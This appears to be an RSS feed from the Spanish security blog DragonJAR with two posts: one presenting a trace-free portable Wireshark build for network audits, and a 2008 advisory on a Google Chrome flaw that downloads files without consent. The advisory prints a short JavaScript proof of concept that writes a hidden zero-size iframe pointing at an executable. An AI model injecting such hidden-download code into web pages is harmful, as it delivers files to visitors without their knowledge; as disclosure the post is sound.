La Comunidad DragonJAR » Ejecutables http://www.dragonjar.org Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD. Sat, 11 Feb 2012 22:13:24 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 Wireshark Portablehttp://www.dragonjar.org/wireshark-portable.xhtml http://www.dragonjar.org/wireshark-portable.xhtml#comments Thu, 13 May 2010 01:34:31 +0000 DragoN http://www.dragonjar.org/?p=4253 es una de esas que no pueden faltar a la hora de realizar un , ya que mayoría de veces por las redes que se analizan pasan una gran cantidad de datos sin cifrar que ponen en riesgo la de la organización.

wireshark Wireshark Portable

El problema es que para utilizar Wireshark, es necesario instalar las librerías Wincap, lo cual necesariamente deja un rastro en el equipo utilizado, algo nada recomendable y algunas veces prohibido en este tipo de auditorias.

Existe una version portable de Wireshark, pero lo que hace es instalar las librerias Wincap y luego cuando se cierra, las desinstala, lo que claramente deja rastros en el equipo utilizado; Afortunadamente Adrián Puente, Ingeniero en Seguridad de sm4rt security services realizo una version de Wireshark realmente , la cual no necesita instalar las librerias Wincap, se ejecuta sin problemas desde una y deja la menor cantidad de rastro posible en la maquina.

Aunque cuenta con una versión un poco viejita de Wireshack, se puede modificar sin problemas para que corra con versiones mas actuales, solo reemplazando los de la aplicación.

Descargar Wireshark Portable para Windows

Mas Información:
Truly Portable Wireshark

También puede interesarte...

]]> http://www.dragonjar.org/wireshark-portable.xhtml/feed 9 Muy Bonito, Muy de la Casa, MUY INSEGUROhttp://www.dragonjar.org/muy-bonito-muy-de-la-casa-muy-inseguro.xhtml http://www.dragonjar.org/muy-bonito-muy-de-la-casa-muy-inseguro.xhtml#comments Thu, 04 Sep 2008 06:12:12 +0000 DragoN http://www.dragonjar.org/?p=1180 El Nuevo de puede ser muy rápido, muy bonito, consumir poca , tener muchas funciones “WoW” pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en que permite (de cualquier tipo) sin el consentimiento del usuario.

Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

<script>
document.write('<iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>

He subido una prueba de concepto al servidor con la calculadora de haciendo click aquí obtendrás algo parecido a esto.

chrome2nk7 Muy Bonito, Muy de la Casa, MUY INSEGURO

El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por “curiosidad”, al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.

chromejg9 Muy Bonito, Muy de la Casa, MUY INSEGURO

La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.

Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome

También puede interesarte...

]]> http://www.dragonjar.org/muy-bonito-muy-de-la-casa-muy-inseguro.xhtml/feed 16